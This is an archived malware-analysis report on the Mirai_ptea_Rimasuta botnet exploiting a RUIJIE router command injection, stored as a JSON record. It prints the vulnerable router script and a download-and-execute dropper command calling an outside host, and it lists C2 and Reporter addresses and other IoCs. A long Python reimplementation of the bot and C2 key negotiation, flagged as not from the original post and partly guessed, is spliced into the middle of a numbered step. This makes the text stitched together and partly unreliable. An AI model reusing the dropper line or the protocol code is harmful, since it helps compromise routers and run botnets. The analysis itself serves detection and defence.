{
	"id": "d80dfb8e-ba4e-4668-9b7f-6adddd895348",
	"created_at": "2026-04-06T00:15:04.630167Z",
	"updated_at": "2026-04-10T03:30:57.164332Z",
	"deleted_at": null,
	"sha1_hash": "fb91003d4911dcb2f5c455bb67a818945936ec12",
	"title": "Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0 day to spread",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 854647,
	"plain_text": "Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0day to spread\r\nBy Hui Wang\r\nPublished: 2021-09-28 · Archived: 2026-04-05 15:06:41 UTC\r\nOverview\r\nIn July 2021 we blogged about Mirai_ptea, a botnet spreading through an undisclosed vulnerability in KGUARD DVR. At first we thought it was a short-lived botnet that would soon disappear, so we just gave it a generic name. But clearly we underestimated the group behind this family, which has in fact been very active and was recently observed spreading through a 0day vulnerability in the RUIJIE NBR700 series routers.\r\nIt is interesting to note that the author included this paragraph in one of the updated samples:\r\n-_- you guys didnt pick up on the name? really???? its ``RI-MA-SU-TA``. not MIRAI_PTEA this is dumb name.\r\nMirai_ptea_Rimasuta now has a built-in mechanism to check whether it is running in a sandbox, and it encrypts its network traffic to counter network-level detection.\r\nTimeline\r\n2021-06-10 Another Mirai variant, mirai_aurora, was first seen exploiting this RUIJIE vulnerability to spread\r\n2021-09-05 We noticed Mirai_ptea_Rimasuta starting to use the exploit\r\n2021-09-06 We notified the vendor of the vulnerability\r\n2021-09-09 The vendor confirmed the vulnerability and informed us that it has stopped maintaining this version of the device. The manufacturer believes the issue can be mitigated by changing the default password, so it does not intend to provide a patch.\r\nVulnerability Analysis\r\nVulnerability Type\r\nCommand injection\r\nVulnerability details\r\nTo avoid abuse, we are not disclosing the full details. 
The description in this section covers only part of the exploitation process.\r\nAn interface named wget_test.asp exists on the RUIJIE router. It accepts URLs passed in from the page for wget testing (the test is eventually carried out by a script named wget_test.sh), but it does not check the incoming parameter for special characters, leading to command injection.\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 1 of 14\n\nNote: the interface requires login authentication. However, the RUIJIE router ships with a weak default password, so an attacker can combine these 2 factors to launch an attack. Changing the default password removes the precondition the botnet relies on, but the command injection itself remains reachable by anyone who can log in.\r\nAccording to our investigation, there are still a great number of online devices with this problem.\r\nwget_test.sh reads as follows:\r\n#!/bin/sh\r\n# $1 is the URL taken from wget_test.asp; it reaches the shell unquoted and unchecked\r\nwhile [ 1 ]\r\ndo\r\nwget -O /dev/null $1;\r\nsleep 1;\r\ndone\r\nKnown affected device versions\r\nNBR1600GDX9 Release(180516)\r\nRGNBR700GDX5 Release(180202)\r\nRGNBR700GDX5 Release(180314)\r\nRGNBR700GDX9 Release(180720)\r\nRGNBR700GWDX5 Release(180314)\r\nRGNBR700GWDX9 Release(180613)\r\nRGNBR700GWDX9 Release(180720)\r\nRGNBR700GWDX9 Release(191023)\r\nRGNBR900GA1C2 Release(170809)\r\nExploit payload analysis\r\nSome of the exploit payloads are shown below:\r\nThe content of the file corresponding to the URL in the above image is shown below. 
At first glance it looks a bit strange, because it is padded with many empty variables (to confuse analysts?). Since the variables are unset, each ${...} expands to nothing and the shell sees the ordinary command names.\r\nv=.rib;\r\ncd ${ENrjHs}/t${hSQGxia}mp;\r\nwg${qyZuBCTFDSMnw}et http://2[.56.244.121/gkTHLPZAAsmP -O ${v};\r\nchm${mBSVmBhyrCQcZ}od +x ${v};\r\n./${v};\r\nWith the empty variables removed, its function is obvious: download the sample and execute it.\r\nv=.rib;\r\ncd /tmp;\r\nwget http://2[.56.244.121/gkTHLPZAAsmP -O ${v};\r\nchmod +x ${v};\r\n./${v};\r\nBotnet size\r\nFrom our vantage point, the trend of active bot source IPs for this botnet is as follows:\r\nBot source IPs are geographically distributed as follows:\r\nSample Analysis\r\nThe basic information of the ARM sample is as follows.\r\nMD5: b01b0bc32469f11a47d6e54eef8c7ffb\r\nELF 32-bit LSB executable, ARM, version 1, statically linked, stripped\r\nPacker: No\r\nLib: uclibc\r\nMirai_ptea_Rimasuta is a Mirai variant with a redesigned encryption algorithm and C2 communication protocol. For encryption it uses the TEA algorithm instead of Mirai's simple XOR, and a lot of sensitive resource information such as the C2 and Tor proxy addresses is encrypted; for C2 communication it goes through a Tor proxy to reach the C2 indirectly. 
For more details on this part, please refer to our previous blog; here we just look at what has changed in this active new sample.\r\n0x1: TEA key\r\nThis Mirai_ptea_Rimasuta sample hardcodes 2 sets of TEA keys, one for encrypting & decrypting sensitive resources and one for encrypting & decrypting network traffic. To distinguish them we call the former Res_teakey and the latter Net_teakey.\r\nRes_teakey is shown as follows.\r\nPart of the resource information decrypts as shown below; note the content of index c.\r\nindex 0, value = /proc/\r\nindex 1, value = /exe\r\nindex 2, value = /fd\r\nindex 3, value = /proc/net/tcp\r\nindex 4, value = /cmdline\r\nindex 5, value = /status\r\nindex 6, value = /maps\r\nindex 7, value = /dev\r\nindex 8, value = /dev/misc\r\nindex 9, value = /dev/misc/watchdog\r\nindex a, value = /dev/watchdog\r\nindex b, value = watchdog\r\nindex c, value = This WEek on NeTLAb 360 bOTnet oPERATOR lEaRNS CHacha SliDe\r\n(as far as we know, none of us know how to dance chacha…yet…)\r\nNet_teakey is shown below.\r\nIt is not used in practice; it just acts as a placeholder, and Mirai_ptea_Rimasuta dynamically generates a new Net_teakey at runtime, which is discussed in the Network protocol section below.\r\n0x2: Sandbox detection\r\nA large number of sandboxes and simulators run samples from a fixed path and name them with an MD5 or a random string. 
Mirai_ptea_Rimasuta takes this cue and checks the path & filename of the sample; only if they meet its requirements does it go ahead and run, otherwise it exits.\r\nThe following shows the legitimate \"run paths\":\r\n./.rib\r\n/XXriXX\r\n0x3: C2 variation\r\nMirai_ptea_Rimasuta uses the following code snippet to get the Tor C2. It shows that the C2 table entry in the encrypted resource is index 0xD and that there are 6 C2s (random mod 6).\r\nThe encrypted information at index 0xD decrypts as follows.\r\nindex d, value = uf7ejrtdd6vvrsobk6rtsuicwogqyf6g72s55qop2kvpt7r4wfui6fqdwrabajewouypwxdsq4rxn7heb3k53ihoogik46\r\nAfter removing the \".onion\" at the end of the string, splitting it into pieces of length 56 and appending .onion to each piece, we get the following 6 C2s, which correspond one-to-one with the 6 ports hard-coded in the sample.\r\nuf7ejrtdd6vvrsobk6rtsuicwogqyf6g72s55qop2kvpt7r4wfui6fqd.onion:20346\r\nwrabajewouypwxdsq4rxn7heb3k53ihoogik46ji6o7gj65yeo33reqd.onion:32288\r\nt5pmcdgiipaznhuexh2usvojfixqzudnizgzeyihsyu7e5rehj7bfkad.onion:17774\r\nrg7t465nvnnzugdbdqdg3yf2pypssynb4wxavgghb4me2lecnw23ivyd.onion:6000\r\nvmdm5jrmksizpt6f7trsno6od7xcfs6hzywah46eaju72jkfvqbqdcqd.onion:27644\r\npnjc66nasxdomwlyqo32d4ft43pooo7s4yuom3gn2gr5bmcpw7lgq4qd.onion:4409\r\n0x4: Network protocol change\r\nThe active Mirai_ptea_Rimasuta sample also starts to encrypt its network traffic with the TEA algorithm. Although a set of keys, Net_teakey, is hard-coded in the sample, it is not used in practice; instead a new key is dynamically generated through negotiation with the C2.\r\nThe whole communication process can be divided into 3 stages:\r\nStage 1. Communication with the C2 is established via the Tor proxy\r\nStage 2. TEA key negotiation\r\nStage 3. 
Receive commands from the C2; note that the traffic is encrypted from this point on\r\nThe focus is on the key negotiation in the second stage. We take the actual traffic shown in the following figure as an example and discuss step by step how Bot & C2 arrive at the same key.\r\nStage 1 is the typical process of establishing communication with a Tor C2. Starting from Stage 2, Mirai_ptea_Rimasuta's packets consist of 3 parts: head (2 bytes), hash (4 bytes) and content (N bytes), where the value of head is fixed within a session and the value of hash is calculated over content by the hash_calc function given in the appendix.\r\nThe whole negotiation process is as follows.\r\n1. Bot randomly generates 12 characters and feeds them to the hash_calc algorithm from the appendix to get the value of Net_teakey[0]. At this point Bot has Net_teakey[0]; C2 does not know any value of Net_teakey yet.\r\n2. Bot randomly generates 8 characters to form content, computes hash = hash_calc(content) and puts the low 16 bits of the hash value into head, then sends this 14-byte packet to C2, and finally runs hash_calc over the whole packet to get Net_teakey[2]. At this point Bot has Net_teakey[0,2] and C2 has Net_teakey[2].\r\n3. C2 returns the packet to Bot; the value of its hash is used in step 4.\r\n4. After receiving the packet back from C2, Bot forms content from its local IP and the random characters from step 1, encrypts it with the TEA algorithm (Res_teakey is the key), constructs a 32-byte packet and sends it to C2, where the value of hash is Net_teakey[1]; finally it runs hash_calc over the C2 hash from step 3 together with its own Bot hash to get Net_teakey[3]. 
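The negotiation above in runnable form, added here as an example and not code from the original post: a Python 3 port of the appendix hash_calc, the head/hash/content framing checked against the stage-2 packet captured in the appendix (head 99 9f, hash 29 9c 9f 99, content 72 53 4b 7f e9 08 7c 9b), and a simulation of the Bot side of steps 1 to 4 together with the C2 side that completes the exchange, ending with both sides holding the same four Net_teakey words. Whatever the post does not spell out is assumed and labelled as such in the code: the Res_teakey value (only an image in the post), standard 32-round TEA in ECB mode with little-endian words, the step-4 content being the local IP followed by the 12 random bytes (16 bytes, where the post reports a 32-byte packet), the order in which the two hashes are concatenated for Net_teakey[3], and the C2 reply in step 3 being a packet of the same shape with random content.

```python
import struct

M = 0xFFFFFFFF
DELTA = 0x9E3779B9
# Res_teakey is only shown as an image in the post; this placeholder is NOT the sample's key.
RES_TEAKEY = (0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210)

def hash_calc(buf: bytes) -> int:
    # Python 3 port of the appendix routine; intermediates are kept to 32 bits.
    n = len(buf)
    cnt, rem, acc = n >> 2, n & 3, n
    for i in range(0, cnt * 4, 4):
        tmp = ((buf[i + 1] << 8) + buf[i] + acc) & M
        tmp2 = (tmp ^ ((((buf[i + 3] << 8) + buf[i + 2]) << 11) & M)) ^ ((tmp << 16) & M)
        acc = (tmp2 + (tmp2 >> 11)) & M
    t = cnt * 4
    if rem == 3:
        tmp = ((buf[t + 1] << 8) + buf[t] + acc) & M
        tmp2 = tmp ^ ((buf[t + 2] << 18) & M) ^ ((tmp << 16) & M)
        acc = (tmp2 + (tmp2 >> 11)) & M
    elif rem == 2:
        tmp = ((buf[t + 1] << 8) + buf[t] + acc) & M
        tmp2 = tmp ^ ((tmp << 11) & M)
        acc = (tmp2 + (tmp2 >> 17)) & M
    elif rem == 1:
        tmp = (((buf[t] + acc) << 10) & M) ^ ((buf[t] + acc) & M)
        acc = (tmp + (tmp >> 1)) & M
    x = acc ^ ((acc << 3) & M)
    x = (x + (x >> 5)) & M
    x = x ^ ((x << 4) & M)
    x = (x + (x >> 17)) & M
    x = x ^ ((x << 25) & M)
    return (x + (x >> 6)) & M

def tea_block(v0: int, v1: int, k, decrypt: bool = False):
    # Standard 32-round TEA (assumed; the post does not show the sample's variant).
    if not decrypt:
        s = 0
        for _ in range(32):
            s = (s + DELTA) & M
            v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & M
            v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & M
        return v0, v1
    s = (32 * DELTA) & M
    for _ in range(32):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & M
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & M
        s = (s - DELTA) & M
    return v0, v1

def tea(data: bytes, key, decrypt: bool = False) -> bytes:
    # ECB over 8-byte blocks with little-endian words (layout assumed).
    out = b''
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack('<II', data[i:i + 8])
        out += struct.pack('<II', *tea_block(v0, v1, key, decrypt))
    return out

def build_packet(head: int, content: bytes) -> bytes:
    # head(2) | hash(4) | content(N); byte order taken from the appendix capture,
    # where head 0x9f99 is sent as 99 9f and hash 0x299c9f99 as 29 9c 9f 99.
    return struct.pack('<H', head) + struct.pack('>I', hash_calc(content)) + content

def parse_packet(pkt: bytes):
    # Returns (head, hash, content), or None when the hash does not cover content.
    head, h = struct.unpack('<H', pkt[:2])[0], struct.unpack('>I', pkt[2:6])[0]
    content = pkt[6:]
    return (head, h, content) if hash_calc(content) == h else None

def stage2_packet(rand8: bytes) -> bytes:
    # Step 2: head is the low 16 bits of hash_calc(content) and stays fixed afterwards.
    return build_packet(hash_calc(rand8) & 0xFFFF, rand8)

def negotiate(nonce12: bytes, rand8: bytes, c2_rand8: bytes, local_ip: bytes):
    # Returns (bot_key, c2_key): the 4 Net_teakey words as each side derives them.
    k0 = hash_calc(nonce12)                         # Bot, step 1
    pkt2 = stage2_packet(rand8)                     # Bot, step 2
    head = struct.unpack('<H', pkt2[:2])[0]
    k2 = hash_calc(pkt2)
    _, bot_hash, _ = parse_packet(pkt2)             # C2 receives step 2
    c2_k2 = hash_calc(pkt2)
    pkt3 = build_packet(head, c2_rand8)             # C2, step 3: same shape, content assumed random
    c2_hash = struct.unpack('>I', pkt3[2:6])[0]
    enc = tea(local_ip + nonce12, RES_TEAKEY)       # Bot, step 4: 16 bytes (32 on the wire; rest undescribed)
    pkt4 = build_packet(head, enc)
    k1 = hash_calc(enc)
    k3 = hash_calc(struct.pack('>II', c2_hash, bot_hash))   # order of the two hashes assumed
    parsed = parse_packet(pkt4)                     # C2, step 5
    if parsed is None:
        raise ValueError('step 4 packet failed the hash check')
    _, c2_k1, enc_in = parsed
    c2_k3 = hash_calc(struct.pack('>II', c2_hash, bot_hash))
    c2_k0 = hash_calc(tea(enc_in, RES_TEAKEY, decrypt=True)[4:])   # strip the 4-byte local IP
    return (k0, k1, k2, k3), (c2_k0, c2_k1, c2_k2, c2_k3)

if __name__ == '__main__':
    print(stage2_packet(bytes.fromhex('72534b7fe9087c9b')).hex())   # 999f299c9f9972534b7fe9087c9b
    bot, c2 = negotiate(b'RiMaSuTa0001', b'rand8byt', b'c2rand8b', bytes([172, 30, 1, 9]))
    print([hex(w) for w in bot], bot == c2)
```

Running the block prints the rebuilt stage-2 packet, which matches the appendix capture byte for byte, then the four key words from the Bot side followed by True. The parse_packet check (hash recomputed over content and compared with the hash field) is what a network sensor would apply to recognise this framing; note that head equals the low 16 bits of the hash only in the first packet, since it stays fixed for the rest of the session.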
At this point Bot knows all 4 values of Net_teakey, acquired in the order [0,2,1,3].\r\n5. After C2 receives Bot's packet, it first takes Net_teakey[1] from the hash field, then gets Net_teakey[3] by hash_calc, and finally decrypts content to recover the 12 characters Bot used in step 1 and obtains Net_teakey[0] by hash_calc. At this point C2 also knows all 4 values of Net_teakey, acquired in the order [2,1,3,0].\r\nThe negotiation ends here, and the subsequent communication between Bot & C2 is encrypted & decrypted with the TEA algorithm using Net_teakey as the key.\r\n0x5: Information gathering function\r\nThis active Mirai_ptea_Rimasuta sample monitors the TCP connections of the compromised device and uploads the details of connections that meet specific criteria to the Reporter. We believe the authors of Mirai_ptea_Rimasuta rely on this collected information for their own data mining.\r\nThe implementation can be divided into the following steps.\r\n1. Get the inode of each current TCP connection from /proc/net/tcp, together with the connection state.\r\n2. Get the socket inodes from /proc/[pid]/fd, match them against the inodes from step 1, and so find the owning process.\r\n3. Get the process's command line from /proc/[pid]/cmdline.\r\n4. If the connection state is \"established\" and the cmdline contains the string \"wget\", the cmdline of the process and the remote address & port of the connection are reported to the Reporter.\r\n5. 
If the connection state is \"listen\", the local port is one of 3451, 8888, 17872 or 9137, and some process has an established connection with this listening process, the cmdline of that process and the remote address & port of the connection are reported to the Reporter.\r\n6. If the connection state is neither \"established\" nor \"listen\", the cmdline of the process and the remote address & port of the connection are reported to the Reporter.\r\nThe following code snippet is used to establish communication with the Reporter, whose address decrypts to gmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion.\r\nAfter successfully establishing communication with the Reporter, the message to be reported is constructed by the following code snippet.\r\nThe actual Report packet generated, and the meaning of its fields, are shown below.\r\nRAW packet\r\n00000000: 5A A5 90 D9 F9 37 B4 D6 00 AC 1E 01 09 3A 77 67 Z....7.......:wg\r\n00000010: 65 74 20 2D 71 20 2D 4F 20 2D 20 68 74 74 70 3A et -q -O - http:\r\n00000020: 2F 2F 69 63 6D 70 2E 64 76 72 69 6E 73 69 64 65 //icmp.dvrinside\r\n00000030: 2E 63 6F 6D 3A 39 30 30 30 2F 47 65 74 50 75 62 .com:9000/GetPub\r\n00000040: 6C 69 63 4E 61 6D 65 20 licName\r\n----------------------------------------------------------------------------\r\nField parsing\r\n5A A5 ----> magic, 2 bytes\r\n90 D9 F9 37 ----> remote ip, 4 bytes\r\nB4 D6 ----> remote port, 2 bytes\r\n00 ----> hardcoded, 1 byte\r\nAC 1E 01 09 ----> local ip, 4 bytes\r\n3A ----> length of cmdline, 1 byte (0x3A = 58)\r\n77 67 ..to end ----> cmdline, 58 bytes\r\nRecommendation\r\nWe recommend that RUIJIE router users check and update their firmware in time. 
Set a complex login password for the Web management interface.\r\nSuggestions\r\nWe recommend that users check and update their device firmware in a timely manner, and check for default accounts that should be disabled.\r\nWe recommend that the following IoCs be monitored and blocked on networks where applicable.\r\nReaders are always welcome to reach us on Twitter or email us at netlab at 360 dot cn.\r\nIoC\r\nDownloader\r\nhttp://2[.56.244.121/tuPuSSbAxXIW\r\nhttp://2[.56.244.121/gkTHLPZAAsmP\r\nhttp://2[.56.244.121/VqIXrFxAGpPD\r\nhttp://2[.56.244.157/qSdYKoxbZakW\r\nhttp://2[.56.244.157/iZXPWXshhRRt\r\nhttp://2[.56.244.157/vnlWcwcBunwk\r\nhttp://2[.56.244.157/IAqecfTrQwQF\r\nhttp://2[.56.244.157/bwgFHtUOGJcv\r\nhttp://2[.56.244.121/KaoJHwKMBiAJ\r\nhttp://2[.56.244.157/yhZyIAclbmhD\r\nhttp://2[.56.244.157/PszBtRNfnzBO\r\nhttp://2[.56.244.157/SywXQrWdNIrM\r\nhttp://2[.56.244.157/awfLWTOmgxTX\r\nhttp://2[.56.244.157/zEkFejmPQeVR\r\nhttp://91[.211.91.56/mIoCinspKSkE\r\nhttp://91[.211.89.242/vkvTxquhFCGV\r\nhttp://91[.211.88.220/OOGRLHgUnshR\r\nSample MD5\r\nb01b0bc32469f11a47d6e54eef8c7ffb\r\n1a5329dcda994df16e6896f870f04f5e\r\n344df0446b8b40588ca5e72ad3ef7217\r\n777792d3df3f1850fa667b4afbb2cfc1\r\na6ddfec272fbf867a4cf3c154eaf47aa\r\n904cbd20a5996125f91f9c7c02ca9bbd\r\nC2\r\nuf7ejrtdd6vvrsobk6rtsuicwogqyf6g72s55qop2kvpt7r4wfui6fqd.onion:20346\r\nwrabajewouypwxdsq4rxn7heb3k53ihoogik46ji6o7gj65yeo33reqd.onion:32288\r\nt5pmcdgiipaznhuexh2usvojfixqzudnizgzeyihsyu7e5rehj7bfkad.onion:17774\r\nrg7t465nvnnzugdbdqdg3yf2pypssynb4wxavgghb4me2lecnw23ivyd.onion:6000\r\nvmdm5jrmksizpt6f7trsno6od7xcfs6hzywah46eaju72jkfvqbqdcqd.onion:27644\r\npnjc66nasxdomwlyqo32d4ft43pooo7s4yuom3gn2gr5bmcpw7lgq4qd.onion:4409\r\nReporter\r\ngmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion:6667\r\ngmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion:6668\r\ngmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion:6669\r\nAppendix\r\n----------------------------------------------------------------------\r\nRAW packet\r\n#00000048 99 9f 29 9c 9f 99 72 53 4b 7f e9 08 7c 9b ..)...rS K...|.\r\n# head 99 9f\r\n# hash 29 9c 9f 99\r\n# content 72 53 4b 7f e9 08 7c 9b\r\n----------------------------------------------------------------------\r\n# hash_calc, ported to Python 3: buf is a bytes object, and every intermediate\r\n# value is reduced modulo 2**32 so the result does not depend on Python's\r\n# unbounded integers.\r\ndef hash_calc(buf, length):\r\n    M = 0xffffffff\r\n    cnt = length >> 2\r\n    cnt2 = length & 3\r\n    acc = length\r\n\r\n    # main loop: 4 bytes per round\r\n    for i in range(0, cnt * 4, 4):\r\n        tmp = ((buf[i + 1] << 8) + buf[i] + acc) & M\r\n        tmp2 = (tmp ^ ((((buf[i + 3] << 8) + buf[i + 2]) << 11) & M)) ^ ((tmp << 16) & M)\r\n        acc = (tmp2 + (tmp2 >> 11)) & M\r\n\r\n    # tail: the remaining 0..3 bytes\r\n    if cnt2 == 3:\r\n        tmp = ((buf[cnt * 4 + 1] << 8) + buf[cnt * 4] + acc) & M\r\n        tmp2 = tmp ^ ((buf[cnt * 4 + 2] << 18) & M) ^ ((tmp << 16) & M)\r\n        acc = (tmp2 + (tmp2 >> 11)) & M\r\n    elif cnt2 == 2:\r\n        tmp = ((buf[cnt * 4 + 1] << 8) + buf[cnt * 4] + acc) & M\r\n        tmp2 = tmp ^ ((tmp << 11) & M)\r\n        acc = (tmp2 + (tmp2 >> 17)) & M\r\n    elif cnt2 == 1:\r\n        tmp = (((buf[cnt * 4] + acc) << 10) & M) ^ ((buf[cnt * 4] + acc) & M)\r\n        acc = (tmp + (tmp >> 1)) & M\r\n\r\n    # final avalanche\r\n    tmp3 = acc ^ ((acc * 8) & M)\r\n    tmp3 = (tmp3 + (tmp3 >> 5)) & M\r\n    tmp4 = tmp3 ^ ((16 * tmp3) & M)\r\n    tmp4 = (tmp4 + (tmp4 >> 17)) & M\r\n    final = tmp4 ^ ((tmp4 << 25) & M)\r\n    final = (final + (final >> 6)) & M\r\n    return final\r\n\r\n# the content field of the packet above\r\ncontent = bytes.fromhex('72 53 4b 7f e9 08 7c 9b')\r\nprint(hex(hash_calc(content, len(content))))   # 0x299c9f99, the hash field of the packet above\r\nSource: https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/"
	],
	"report_names": [
		"rimasuta-spread-with-ruijie-0day-en"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434504,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb91003d4911dcb2f5c455bb67a818945936ec12.pdf",
		"text": "https://archive.orkl.eu/fb91003d4911dcb2f5c455bb67a818945936ec12.txt",
		"img": "https://archive.orkl.eu/fb91003d4911dcb2f5c455bb67a818945936ec12.jpg"
	}
}